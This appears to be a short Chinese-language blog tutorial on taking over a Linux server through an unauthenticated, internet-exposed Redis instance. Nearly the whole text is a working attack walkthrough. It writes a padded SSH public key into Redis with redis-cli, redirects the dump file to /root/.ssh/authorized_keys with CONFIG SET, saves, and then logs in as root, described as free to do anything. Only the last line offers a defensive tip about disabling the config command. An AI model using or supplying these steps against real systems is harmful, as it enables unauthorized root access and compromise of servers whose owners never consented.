通过redis漏洞入侵系统
熟悉linux ssh应该知道可以在authorized_keys添加自己的共有密钥以达到免密码登录系统的目的。本文将展现如何通过redis漏洞达到入侵系统的目的。
前提
redis 开放端口:0.0.0.0:6379
smou:_posts $ ps x|grep redis
29251 ?? S 0:00.04 /usr/local/opt/redis/bin/redis-server 0.0.0.0:6379
入侵过程
1. 创建公钥~/.ssh/id_rsa.pub,有则跳过
ssh-keygen -t rsa
一路确认就行
2. 生成前面带有双换行的临时文件
进入~/.ssh/
echo -n -e '\n\n' > 2 && cat id_rsa.pub >>2
3. 入侵
# 设置key, crackit = 2文件内容
cat 2 | redis-cli -h 192.168.12.101 -x set crackit
# 连接服务器
redis-cli -h 192.168.12.101
# 设置目录(注意是用户的home目录,不一定root)
config set dir /root/.ssh
# 设置文件名
config set dbfilename authorized_keys
# 保存
save
4. 登录
这时候通过 ssh root@192.168.12.101 就能进入系统,接下来就可以为所欲为.
总结
所以使用redis,注意关闭config功能,否则,就要等着哭了。